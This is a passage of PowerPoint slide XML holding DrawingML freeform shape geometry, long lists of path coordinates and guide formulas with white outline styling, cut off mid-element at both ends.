                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36288" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4598" y="2644"/>
                <a:ext cx="146" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 146"/>
                  <a:gd name="T1" fmla="*/ 48 h 213"/>
                  <a:gd name="T2" fmla="*/ 50 w 146"/>
                  <a:gd name="T3" fmla="*/ 39 h 213"/>
                  <a:gd name="T4" fmla="*/ 50 w 146"/>
                  <a:gd name="T5" fmla="*/ 20 h 213"/>
                  <a:gd name="T6" fmla="*/ 58 w 146"/>
                  <a:gd name="T7" fmla="*/ 0 h 213"/>
                  <a:gd name="T8" fmla="*/ 78 w 146"/>
                  <a:gd name="T9" fmla="*/ 2 h 213"/>
                  <a:gd name="T10" fmla="*/ 78 w 146"/>
                  <a:gd name="T11" fmla="*/ 19 h 213"/>
                  <a:gd name="T12" fmla="*/ 72 w 146"/>
                  <a:gd name="T13" fmla="*/ 42 h 213"/>
                  <a:gd name="T14" fmla="*/ 65 w 146"/>
                  <a:gd name="T15" fmla="*/ 54 h 213"/>
                  <a:gd name="T16" fmla="*/ 73 w 146"/>
                  <a:gd name="T17" fmla="*/ 74 h 213"/>
                  <a:gd name="T18" fmla="*/ 85 w 146"/>
                  <a:gd name="T19" fmla="*/ 70 h 213"/>
                  <a:gd name="T20" fmla="*/ 95 w 146"/>
                  <a:gd name="T21" fmla="*/ 81 h 213"/>
                  <a:gd name="T22" fmla="*/ 103 w 146"/>
                  <a:gd name="T23" fmla="*/ 81 h 213"/>
                  <a:gd name="T24" fmla="*/ 99 w 146"/>
                  <a:gd name="T25" fmla="*/ 92 h 213"/>
                  <a:gd name="T26" fmla="*/ 85 w 146"/>
                  <a:gd name="T27" fmla="*/ 78 h 213"/>
                  <a:gd name="T28" fmla="*/ 78 w 146"/>
                  <a:gd name="T29" fmla="*/ 81 h 213"/>
                  <a:gd name="T30" fmla="*/ 64 w 146"/>
                  <a:gd name="T31" fmla="*/ 81 h 213"/>
                  <a:gd name="T32" fmla="*/ 58 w 146"/>
                  <a:gd name="T33" fmla="*/ 69 h 213"/>
                  <a:gd name="T34" fmla="*/ 59 w 146"/>
                  <a:gd name="T35" fmla="*/ 67 h 213"/>
                  <a:gd name="T36" fmla="*/ 140 w 146"/>
                  <a:gd name="T37" fmla="*/ 194 h 213"/>
                  <a:gd name="T38" fmla="*/ 129 w 146"/>
                  <a:gd name="T39" fmla="*/ 195 h 213"/>
                  <a:gd name="T40" fmla="*/ 129 w 146"/>
                  <a:gd name="T41" fmla="*/ 213 h 213"/>
                  <a:gd name="T42" fmla="*/ 124 w 146"/>
                  <a:gd name="T43" fmla="*/ 203 h 213"/>
                  <a:gd name="T44" fmla="*/ 107 w 146"/>
                  <a:gd name="T45" fmla="*/ 195 h 213"/>
                  <a:gd name="T46" fmla="*/ 100 w 146"/>
                  <a:gd name="T47" fmla="*/ 176 h 213"/>
                  <a:gd name="T48" fmla="*/ 88 w 146"/>
                  <a:gd name="T49" fmla="*/ 181 h 213"/>
                  <a:gd name="T50" fmla="*/ 77 w 146"/>
                  <a:gd name="T51" fmla="*/ 190 h 213"/>
                  <a:gd name="T52" fmla="*/ 77 w 146"/>
                  <a:gd name="T53" fmla="*/ 180 h 213"/>
                  <a:gd name="T54" fmla="*/ 88 w 146"/>
                  <a:gd name="T55" fmla="*/ 171 h 213"/>
                  <a:gd name="T56" fmla="*/ 102 w 146"/>
                  <a:gd name="T57" fmla="*/ 167 h 213"/>
                  <a:gd name="T58" fmla="*/ 112 w 146"/>
                  <a:gd name="T59" fmla="*/ 165 h 213"/>
                  <a:gd name="T60" fmla="*/ 122 w 146"/>
                  <a:gd name="T61" fmla="*/ 158 h 213"/>
                  <a:gd name="T62" fmla="*/ 132 w 146"/>
                  <a:gd name="T63" fmla="*/ 156 h 213"/>
                  <a:gd name="T64" fmla="*/ 139 w 146"/>
                  <a:gd name="T65" fmla="*/ 154 h 213"/>
                  <a:gd name="T66" fmla="*/ 145 w 146"/>
                  <a:gd name="T67" fmla="*/ 166 h 213"/>
                  <a:gd name="T68" fmla="*/ 146 w 146"/>
                  <a:gd name="T69" fmla="*/ 183 h 213"/>
                  <a:gd name="T70" fmla="*/ 0 w 146"/>
                  <a:gd name="T71" fmla="*/ 165 h 213"/>
                  <a:gd name="T72" fmla="*/ 15 w 146"/>
                  <a:gd name="T73" fmla="*/ 150 h 213"/>
                  <a:gd name="T74" fmla="*/ 18 w 146"/>
                  <a:gd name="T75" fmla="*/ 152 h 213"/>
                  <a:gd name="T76" fmla="*/ 5 w 146"/>
                  <a:gd name="T77" fmla="*/ 162 h 213"/>
                  <a:gd name="T78" fmla="*/ 82 w 146"/>
                  <a:gd name="T79" fmla="*/ 146 h 213"/>
                  <a:gd name="T80" fmla="*/ 95 w 146"/>
                  <a:gd name="T81" fmla="*/ 125 h 213"/>
                  <a:gd name="T82" fmla="*/ 94 w 146"/>
                  <a:gd name="T83" fmla="*/ 137 h 213"/>
                  <a:gd name="T84" fmla="*/ 92 w 146"/>
                  <a:gd name="T85" fmla="*/ 156 h 213"/>
                  <a:gd name="T86" fmla="*/ 29 w 146"/>
                  <a:gd name="T87" fmla="*/ 134 h 213"/>
                  <a:gd name="T88" fmla="*/ 36 w 146"/>
                  <a:gd name="T89" fmla="*/ 122 h 213"/>
                  <a:gd name="T90" fmla="*/ 33 w 146"/>
                  <a:gd name="T91" fmla="*/ 136 h 213"/>
                  <a:gd name="T92" fmla="*/ 76 w 146"/>
                  <a:gd name="T93" fmla="*/ 121 h 213"/>
                  <a:gd name="T94" fmla="*/ 91 w 146"/>
                  <a:gd name="T95" fmla="*/ 116 h 213"/>
                  <a:gd name="T96" fmla="*/ 82 w 146"/>
                  <a:gd name="T97" fmla="*/ 130 h 213"/>
                  <a:gd name="T98" fmla="*/ 122 w 146"/>
                  <a:gd name="T99" fmla="*/ 117 h 213"/>
                  <a:gd name="T100" fmla="*/ 114 w 146"/>
                  <a:gd name="T101" fmla="*/ 105 h 213"/>
                  <a:gd name="T102" fmla="*/ 128 w 146"/>
                  <a:gd name="T103" fmla="*/ 103 h 213"/>
                  <a:gd name="T104" fmla="*/ 129 w 146"/>
                  <a:gd name="T105" fmla="*/ 122 h 213"/>
                  <a:gd name="T106" fmla="*/ 54 w 146"/>
                  <a:gd name="T107" fmla="*/ 89 h 213"/>
                  <a:gd name="T108" fmla="*/ 66 w 146"/>
                  <a:gd name="T109" fmla="*/ 90 h 213"/>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46"/>
                  <a:gd name="T166" fmla="*/ 0 h 213"/>
                  <a:gd name="T167" fmla="*/ 146 w 146"/>
                  <a:gd name="T168" fmla="*/ 213 h 213"/>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46" h="213">
                    <a:moveTo>
                      <a:pt x="51" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="50" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="141" y="195"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="140" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="195"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="165"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="165"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="92" y="156"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="89" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="156"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="27" y="140"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
